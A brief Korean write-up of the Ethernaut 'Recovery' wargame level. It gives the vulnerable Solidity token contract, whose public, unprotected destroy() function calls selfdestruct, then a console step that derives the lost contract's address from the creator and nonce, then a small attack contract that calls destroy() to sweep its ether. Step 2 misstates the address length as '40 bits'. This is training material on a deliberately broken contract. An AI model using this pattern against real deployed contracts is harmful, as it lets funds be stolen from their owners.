[Ethernaut] 17. Recovery

소스코드

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Recovery {

  //generate tokens
  function generateToken(string memory _name, uint256 _initialSupply) public {
    new SimpleToken(_name, msg.sender, _initialSupply);
  
  }
}

contract SimpleToken {

  using SafeMath for uint256;
  // public variables
  string public name;
  mapping (address => uint) public balances;

  // constructor
  constructor(string memory _name, address _creator, uint256 _initialSupply) public {
    name = _name;
    balances[_creator] = _initialSupply;
  }

  // collect ether in return for tokens
  receive() external payable {
    balances[msg.sender] = msg.value.mul(10);
  }

  // allow transfers of tokens
  function transfer(address _to, uint _amount) public { 
    require(balances[msg.sender] >= _amount);
    balances[msg.sender] = balances[msg.sender].sub(_amount);
    balances[_to] = _amount;
  }

  // clean up after ourselves
  function destroy(address payable _to) public {
    selfdestruct(_to);
  }
}

목표

잃어버린 컨트랙트의 잔고를 0으로 만들어라

 

 

방법

콘솔에서

1. await contract.address
2. web3.utils.soliditySha3("0xd6", "0x94", contract.address, "0x01") //결과의 우측 40 bits 복사
3. 코드 작성

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./Recovery.sol";

contract RecoverAttack {
    SimpleToken target;
    constructor(address payable _adr) {
        target = SimpleToken(_adr);

    }

    function remove(address payable _address) public {
        target.destroy(_address);
    }
    
}